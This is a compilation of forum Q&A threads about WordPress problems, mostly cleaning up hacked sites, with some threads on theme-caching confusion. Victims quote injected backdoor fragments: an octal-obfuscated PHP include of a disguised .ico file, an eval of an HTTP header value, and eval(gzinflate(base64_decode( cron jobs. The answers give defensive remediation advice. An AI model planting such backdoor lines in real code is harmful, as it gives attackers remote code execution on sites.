So I have a wordpress website that has a malicious link being added in the navigation of my site but when I log in it disappears and I can find no trace of it in the code at all. I am wondering if anyone has had this issue before and how they took care of it.
First thing to do is change to the default twentyfifteen or twentyfourteen theme and disable all plugins and see if the link is still there. If it's not, reactivate your theme and see if the link returns. If it does, it's from the theme; the theme is either hacked (see below) or it's a free (or junk) theme and the author added the link.
If the theme is not adding the link, reactivate plugins one at a time to see which one may be adding the link.
Depending on above: this sounds like you got hacked. Time to fix it right the first time, or you will get hacked again. You need to replace all core WP files/folders (except wp-config.php and wp-content), but scan the uploads folder and theme for exploit code and modified files or added files, comparing to a copy of your original theme. Replace all plugins, too.
Also scan the database for eval code and added administrators. (See "My Site was Hacked" below).
Change all host, FTP and WordPress passwords in the process. Scan your own PC for malware that might have grabbed logins and passwords.
Tell your web host you got hacked; and consider changing to a more secure host.
Carefully follow FAQ - My Site Was Hacked at WordPress.org.
Then take a look at the recommended security measures in Hardening WordPress and Brute Force Attacks at WordPress.org.
Related
I have a problem with my website, I get information from wordfence about my WordPress website getting hacked
enter image description here add found a code eval($_SERVER['HTTP_81DB2B3'] so i removed it but in a few second the code going back. someone, please help me
I had something very similar to this. Go to your cPanel and search for "Cron Jobs" and scroll down to see if there's any malicious cronjobs setup. You might have some that look like eval(gzinflate(base64_decode(.... that are essentially causing this to reoccur. Not a complete fix to this issue, but you'll have to delete those cronjobs to ensure that that line of code doesn't keep reappearing. In addition to that, you'll also need to make sure those cronjobs don't show up again. Use a plugin like Wordfence (suggested above as well) to look for malicious files and if it helps replace your home directory (except for wp-content and wp-config) with fresh files.
If your website got hacked then I guess more than 1 file was affected by it,
case-1: If you are able to access the Wordpress Backend In this case, if you are able to access the Wordpress backend then I suggest you
Step-1: Add one plugin called (Wordfence Security – Firewall & Malware Scan
) and scan your website with it.
Step-2: After scanning the site remove all suspicious code from the site.
Case 2: If you are not able to access the Wordpress backend then you have to update your Wordpress manually with the hosting file manager or FTP.
Please Note: Please take a backup of your website before do any changes.
My Wordpress is only showing me the following in the picture "My First Heading" and "My First paragraph". I tried to add themes and customise it but it is not changing. Also, I have added another page and I made it as homepage of the website, but still it does not work. Besides I reset my whole website and nothing happened.
I do not have enough points to put a comment, so I will post here. It is not possible to give a straight-forward answer to this, since there may be many reasons why this is showing. Here are some general tips that may help:
Check via ftp if your root directory contains any index.html files. If yes, remove them. WordPress uses index.php to load.
Go to WP Admin and switch off all plugins.
Turn on the default WordPress theme (Twenty Twenty or Twenty One, depending on your WordPress version)
Contact your host (send a ticket)
If none of this work, create a full site backup, then reinstall WordPress (make sure there are no other files on your server that can mess with the installation)
It looks like my wordpress site has been hacked. Following code snipt was in index.php, wp-config.php
<?php
/*6b9bb*/
#include "\057ho\155e/\151nt\145r7\0602/\160ub\154ic\137ht\155l/\167p-\151nc\154ud\145s/\152s/\164in\171mc\145/.\146b4\063d6\0700.\151co";
/*6b9bb*/
I have changed:
WP Admin URL and put strong password username
changed cpanel/FTP password with strong one
Implemented iTheme Security
Updated Wordpress to latest (themes and plugins)
However, the code again repeated. What can be good solutions?
p.s. I am using siteground.
Thanks
Yeah someone is including a .ico file (open it with a Text Editor, and you will see it is some php Code and no real ico file)
/home/inter702/public_html/wp-includes/js/tinymce/.fb43d680.ico
Somehow despite your changes of host and passwords you hacker is able to get in, once they are in they can setup all sorts of backdoors to keep access, any .php file of theirs can do this.
At the moment closing the initial front-door they use is your sole occupation.
Follow the advice in this article:
https://codex.wordpress.org/FAQ_My_site_was_hacked
And then: https://codex.wordpress.org/Hardening_WordPress
Here are some links about backdoors:
http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/
http://smackdown.blogsblogsblogs.com/2012/11/14/hacked-on-hostpapa-or-netregistry/
http://ottopress.com/2009/hacked-wordpress-backdoors/
Source: https://wordpress.org/support/topic/wordpress-hacked-strange-files-appears/
Once the site is hacked, in my opinion, resistance is futile. No scan or tool will help you. you'll have to replace all files with fresh downloads. mostly it's straight forward:
Backup the whole installation (just in case)
Download the complete wp-content/uploads folder
Make a Screenshot or save the page with the currently active plugins
Delete ALL files
Get a fresh wordpress setup and extract it
Download a fresh copy of your theme and child-theme (recreate the previous setup)
Copy the previous wp-config.php to this fresh install. but take a GOOD look at it. usually it also has some virus/backdoors in it. usually easy to see and remove. now you're already connected with your DB
Examine the saved uploads folder for files that shouldnt be there, like php files. then upload it to the new folder
Reinstall all plugins, fresh downloads
I faced this problem too, and step by step I did the steps below:
Cleaning the injected code, manually
Changing all the passwords
Hiding the WP admin dashboard URL
Limiting the login attempts
Installing security plugins (Sucuri, Wordfence security)
Contracting with Sucuri plan
The good thing is to install Wordfence security plugin, run the scan, then you will detect all the files with the injected code and you can clean the injected code manually.
you can also visit this link too
https://naderzad.info/web-development/wordpress-code-injection/
I'm having a very basic problem: I'm trying to create a new theme for a wordpress installation locally on my computer.
I've created a styles.css and index.php file and put it in a folder in wp-content/themes. But it doesn't appear in the Wordpress themes page.
As a test, I made a change to the description of one of the existing themes (Twenty-Ten) in its style.css, and refresh the Wordpress themes page, but the old description continues to be shown. This suggests to me that I'm simply using the wrong folder, but that's not possible! Any ideas on this problem much appreciated.
UPDATE: In fact, even when I delete Twenty Ten from the Themes folder, it's still available as an option in the Wordpress backend, and I can activate it... Very strange...
G
I agree with your diagnosis. You are either looking at the wrong folder or in fact the wrong computer. There's no other way that you could change the theme to one that has been deleted.
I suggest that you confirm you are in the same universe you think you are in. Create a simple file localserver.txt in your WordPress directory and then confirm that you can access that file.
If you can't, you have your answer. You are somehow accessing a different location.
If you can access that text file, you need to go further and look to see if something like the site url setting is redirecting you to the live site, without you realizing it, when you access wp-admin.
Beyond that, I'd need to know more about your setup. Something like having www.example.com in your /etc/host file and not example.com can cause similar confusion...
Are you using Wordpress Multisite?
In that case you have to 'enable' that theme in the Network admin manager
Greetings and thanks in advance for your feedback. Now I realize that this isn't GoDaddy tech support but I'm asking the question here before I step into those murky, black waters.
Scenario: I edit the CSS and various templates for the default template via Appearance > Editor. All looks and performs great. I hand off to my client. She reports back that after adding a new post the customizations are overwritten and the default theme files are restored! She claims that GoDaddy told her that its "on my end."
Nonsense, right? There is no relation between adding a post and updating theme files, right?
This is the second time this has occurred - the first time we assumed GoDaddy had backups of the customized files (not). At least with the second occurrence, I had a local backup.
Any ideas or suggestions?
either that or the wordpress install has been upgraded, if your theme folder is still using the default then it will be overwritten by wordpress on upgrade..
if so change your default theme folder to something else...
then edit the css file and give it a new name...
Use FTP and a text editor to edit the theme files directly and check their permissions. I think the changes are not taking effect because you've got file permission problems, and as soon as the client forces a reload of the site, she sees the unchanged files again.
And if you're using a Windows server, consider changing to Linux. GoDaddy has lots of problems with Wordpress on Windows, from permission problems to permalinks. You can change to a Linux server in a few hours: Switching Your Hosting Account Operating System - GoDaddy Help Center